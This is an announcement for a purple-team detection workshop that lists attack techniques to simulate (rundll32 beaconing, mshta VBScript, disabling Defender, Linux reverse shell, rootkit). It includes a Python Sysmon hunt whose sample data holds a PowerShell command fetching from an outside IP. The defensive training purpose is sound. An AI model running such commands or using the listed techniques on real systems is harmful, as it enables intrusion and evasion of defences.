DELIVERY: VIRTUAL LIVE STREAM
DISCORD : https://discord.gg/XM86uPxxBZ
DATE: 16 March 2021
TIME: 19:00 to 21:00 CET/GMT+1
The first workshop of the PurpleLabs series generated a great deal of interest in the scope of detection and threat hunting!
For the first 5 registrations, Leszek will provide 7 days of full access to the PurpleLabs environment supplied with a set of 60+ hands-on lab instructions in the purple teaming structure.
During session #1, we covered how to get the network and OS visibility/telemetry needed for advanced detection with Open Source / free tools. We ran a few simple hunting examples and demonstrated how to use Sigma / Sentinel rules as hints/guides to learn more in the ‘detection vs attack’ formula.
We need to keep learning how adversaries are operating, so after a good introduction to the subject, it’s time for the next step.
During hands-on session #2*, Leszek is going to demonstrate how to create and simulate chain attack steps:
- Rundll32 communicating with public IP addresses
- CMSTP Execution
- Mshta executing VBScript
- Disabling Windows Defender / modifying Windows Firewall
- Suspicious non-browser attempts to access suspicious URL
- Suspicious scheduled task creation
- Powershell execution with IP arguments
- Malicious Named Pipe
- Suspicious Linux Reverse Shell Command Line
- Linux kernel space rootkit
- and more
and provide detection coverage for the tools, techniques, and procedures by using the PurpleLabs stack:
- HELK + ElastAlert
- Sigma rules
- Sysmon + Windows Events
- Moloch FPC
- Suricata IDS
- Zeek IDS
* This is a continuation of the topic from the first session.
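As an added example (not part of the workshop material or the PurpleLabs stack): a small Python hunt over constructed Sysmon-style events that covers three of the chain steps listed above: rundll32 talking to a public IP, PowerShell started with an IP argument, and mshta running inline VBScript. The event field names, the sample values and the list of internal address ranges are assumptions for this illustration.

```python
import ipaddress
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style events (hypothetical sample data, not PurpleLabs telemetry).
# EventID 1 = process creation, EventID 3 = network connection, as in Sysmon.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "1", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -c Invoke-WebRequest http://203.0.113.10/x"},
    {"EventID": "3", "Image": r"C:\Windows\System32\rundll32.exe", "DestinationIp": "198.51.100.7"},
    {"EventID": "3", "Image": r"C:\Windows\System32\rundll32.exe", "DestinationIp": "10.0.0.5"},
    {"EventID": "1", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'mshta.exe vbscript:MsgBox("constructed sample")'},
    {"EventID": "1", "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
]

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Ranges treated as internal for this lab (assumption: adjust to your own address plan).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_public_ip(addr: str) -> bool:
    """True when addr is a valid IP address outside the INTERNAL_NETS ranges."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return not any(ip in net for net in INTERNAL_NETS)


def detect(event: Dict[str, str]) -> List[str]:
    """Return the names of the workshop detection items this single event matches."""
    hits: List[str] = []
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    # Rundll32 communicating with public IP addresses: EID 3 to a non-internal destination
    if event.get("EventID") == "3" and image.endswith("\\rundll32.exe") \
            and is_public_ip(event.get("DestinationIp", "")):
        hits.append("rundll32_public_ip")
    # PowerShell execution with IP arguments: EID 1 with an IPv4 literal on the command line
    if event.get("EventID") == "1" and image.endswith("\\powershell.exe") and IPV4_RE.search(cmd):
        hits.append("powershell_ip_argument")
    # Mshta executing VBScript: EID 1 using the inline vbscript: protocol handler
    if event.get("EventID") == "1" and image.endswith("\\mshta.exe") and "vbscript:" in cmd.lower():
        hits.append("mshta_vbscript")
    return hits


def hunt(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Run every rule over a batch of events; returns (event index, rule name) pairs."""
    return [(i, h) for i, e in enumerate(events) for h in detect(e)]
```

The same three conditions map directly onto Sigma `selection` blocks (EventID, Image|endswith, CommandLine|contains), which is how the stack above would carry them into HELK + ElastAlert.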
For those who want to know more about this hands-on cyber range project, here’s the all-in-one picture:
Key Learning Objectives
- Find out how Detection / Hunting Open Source Software can support your SOC infrastructure & team.
- Learn ways to improve detection and sharpen your event correlation skills across many different data sources
- Generate evil, find the malicious activities, and identify threat details on the network
- Prepare your SOC team to filter out network noise quickly and allow for better incident response handling
- Understand the value of manual and automated approaches to simulating attackers and generating anomalies